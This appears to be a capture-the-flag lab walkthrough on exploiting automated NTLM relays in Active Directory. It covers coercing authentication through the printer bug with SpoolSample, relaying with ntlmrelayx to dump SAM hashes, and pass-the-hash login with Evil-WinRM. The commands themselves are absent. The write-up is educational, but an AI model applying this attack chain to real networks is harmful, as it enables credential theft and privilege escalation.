Exploiting Automated Relays
In this task we will take a look at some automated relays. Authentication attempts are constantly flying across the network. If we are lucky, we can intercept some of these challenges to gain access. But what if we don't like to wait? What if we can coerce authentication to occur?
Although we already have privileged access to THMSERVER1, we could be in a position where we did not have access to a constrained delegation exploit. This is another excellent attack that can be performed to gain privileged access to hosts.
Machine Accounts
Machine Accounts (simplified)
1️⃣ Every Windows computer in a domain has a machine account.
Think of it like a user account, but for a computer.
The account name is the computer's name with a
$, e.g.,THMSERVER1$.
2️⃣ Machine account passwords are super long (120 characters) and auto-rotate every 30 days.
3️⃣ Machine accounts are heavily used in Active Directory (AD).
Domain controllers use them to sync AD updates.
When a computer requests a certificate, it authenticates using its machine account.
4️⃣ Sometimes, one machine has admin rights over another.
This happens in setups like SQL clusters or domain controllers.
If misconfigured, attackers can exploit this to force authentication and escalate privileges.
We first need to identify cases where a machine account has administrative access over another machine. We can use Bloodhound for this, but we will use this custom query:
This is very interesting. It shows us that the THMSERVER2 machine account has administrative privileges over the THMSERVER1 machine.
The Printer Bug
The printer bug is a "feature" of the MS-RPRN protocol (PrintSystem Remote Protocol), which allows a domain user to remotely force a target host running the Print Spooler service to authenticate to an arbitrary IP address. There have been a few of these bugs in recent years: Spooler, PetitPotam, PrintNightmare.
Therefore, to exploit this, apart from machine account administrative privileges, we also need to meet the following four conditions :
A valid set of AD account credentials.
Network connectivity to the target's SMB service.
The target host must be running the Print Spooler service.
The hosts must not have SMB signing enforced.
Condition 1 and 2 have been met already. The only two we need to ensure works are conditions 3 and 4.
Print Spooler Service
We need to determine if the Print Spooler service is running. Since we don't have access to THMSERVER2, we need to query from the network perspective. In this case, we can use a WMI query from our SSH session on THMWRK1 Workstation to query the service's current state:
The output from the cmdlet verifies that the service is running.
SMB Signing
In order to relay the coerced authentication attempt, SMB signing should not be enforced. It should be noted that there is a difference between SMB signing being allowed and SMB signing being enforced. Since some legacy systems do not support SMB signing, by default, the configuration of SMB is that signing is allowed but not enforced, meaning that it will only be used if supported. Since we will be hosting a malicious SMB server, we can ensure our server does not support signing, forcing the target not to sign the SMB authentication attempt.
Verify that THMSERVER1 and THMSERVER2 do not have SMB signing enforced using Nmap
Exploiting Authentication Relays
Using this Github repo, we will be using SpoolSample that was already compiled in the task
We will use Spoolsample.exe to coerce THMSERVER2 to authenticate to us on the attacking machine and then use Impacket's ntlmrelayx to relay the authentication attempt THMSERVER1.
We received a callback and dumped the SAM hashes of THMSERVER1
Login as ServerAdmin using Evil-WinRM by passing the hash
Get the flag in user Administrator.ZA
Last updated